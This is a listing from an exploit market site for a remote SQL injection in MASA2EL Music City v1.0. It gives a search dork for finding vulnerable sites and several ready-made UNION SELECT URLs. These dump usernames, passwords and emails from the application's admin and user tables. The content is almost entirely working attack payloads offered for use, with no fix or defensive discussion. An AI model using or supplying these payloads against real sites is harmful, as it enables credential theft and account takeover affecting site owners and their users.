[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MASA2EL Music City v1.0 Remote Sql Injection Vulnerability

Author
alnjm33
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10765
Category
web applications
Date add
04-02-2010
Platform
unsorted
==========================================================
MASA2EL Music City v1.0 Remote Sql Injection Vulnerability
==========================================================

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : MASA2EL Music City Remote Sql Injection Vulnerability
Author: alnjm33
Software Link: http://www.masa2el.com/index.php?go=dl&type=d&id=4
Tested on: Version 1.0
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (Powered By : MASA2EL Music City 1.0 )

=======================================================================================

>>|~[SQL]
    Admin Info :
http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_user--

    User Info :
http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword,0x3a,email),2,3 from masa2el_user--
http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--




#  0day.today [2024-10-06]  #